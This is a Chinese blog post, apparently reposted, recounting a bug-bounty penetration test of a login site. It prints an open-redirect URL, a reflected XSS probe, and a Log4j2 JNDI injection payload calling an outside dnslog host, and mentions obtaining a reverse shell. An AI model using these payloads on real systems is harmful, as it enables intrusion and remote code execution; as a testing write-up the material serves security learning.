实战 | 记录一次漏洞挖掘渗透经历

admin 2023年2月16日22:46:07评论70 views字数 1104阅读3分40秒阅读模式

前言

技术很菜,有什么错误和不足还请师傅们指正

目标

本次渗透的目标是补天上某项目,通过信息收集找到了登陆界面

实战 | 记录一次漏洞挖掘渗透经历

对一个网站渗透的方法有很多,遇到这样的界面我们通常的思路就是查网站源码、万能密码登录、XSS、SQL注入、密码爆破、修改code进行未授权访问、未受保护的api信息泄露、忘记密码的逻辑绕过、命令执行如log4j2等漏洞,这时候就看我们各自的骚操作了。

第一个漏洞:url任意跳转

直接F12大法,看一下网站前段源码

实战 | 记录一次漏洞挖掘渗透经历

https://127.0.0.1/index?client_name=CasClient&realRequestUrl=https://xxx.com/abc

找到了一段跳转代码:

替换掉realRequestUrl参数为https://www.baidu.com

https://127.0.0.1/index?client_name=CasClient&realRequestUrl=https://www.baidu.com

实战 | 记录一次漏洞挖掘渗透经历

第二个漏洞:XSS漏洞

 在登录界面随便输入一个账号密码test,看一下返回的信息

实战 | 记录一次漏洞挖掘渗透经历

 

得到错误信息,发现url里面有Get类型的错误参数,如果没有过滤的话我们将文字替换为<script>alert('1')</script> 可以得到XSS漏洞,没有过滤,拿下xss

实战 | 记录一次漏洞挖掘渗透经历

  第三个漏洞:log4j2命令执行

后台渗透了一下,没进去,还是我太菜了,于是转到主页面进行渗透,任何一个参数都有可能是我们渗透过程中的刺刀。通过打入XSS、SQL和命令执行语句来进行判断网站是否存在漏洞。经过各个参数的注入,找到一个参数可以执行log4j2漏洞

playload为:

https://127.0.0.1/search/opportunity?searchType=${jndi:ldap://test.7ih4h0.dnslog.cn}&pageNumber=1

实战 | 记录一次漏洞挖掘渗透经历

 

 然后利用jndi注入工具在攻击机上开启jndi服务器,利用payload开始攻击,获得反弹shell

实战 | 记录一次漏洞挖掘渗透经历

 结语

每一个参数都有可能是我们渗透成功的利刃,不要因为个别参数不行而放弃所有参数

实战 | 记录一次漏洞挖掘渗透经历


推荐阅读


实战 | 记一次渗透拿下某儿童色情网站的经过


实战 | 记一次企业钓鱼演练


2022年,从现在开始学安全还不迟!


干货 | 2022年超全的安全知识库


实战 | 实战一次完整的BC网站渗透测试


作者:mantou0

文章来源:https://www.cnblogs.com/mantou0/p/16479904.html

如有侵权,请联系删除


星球部分精华内容推荐

实战 | 记录一次漏洞挖掘渗透经历

实战 | 记录一次漏洞挖掘渗透经历

实战 | 记录一次漏洞挖掘渗透经历

实战 | 记录一次漏洞挖掘渗透经历

实战 | 记录一次漏洞挖掘渗透经历

实战 | 记录一次漏洞挖掘渗透经历

其他更多精彩内容,欢迎加入我们的星球

实战 | 记录一次漏洞挖掘渗透经历

原文始发于微信公众号(HACK学习君):实战 | 记录一次漏洞挖掘渗透经历

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月16日22:46:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 记录一次漏洞挖掘渗透经历https://cn-sec.com/archives/1276906.html

发表评论

匿名网友 填写信息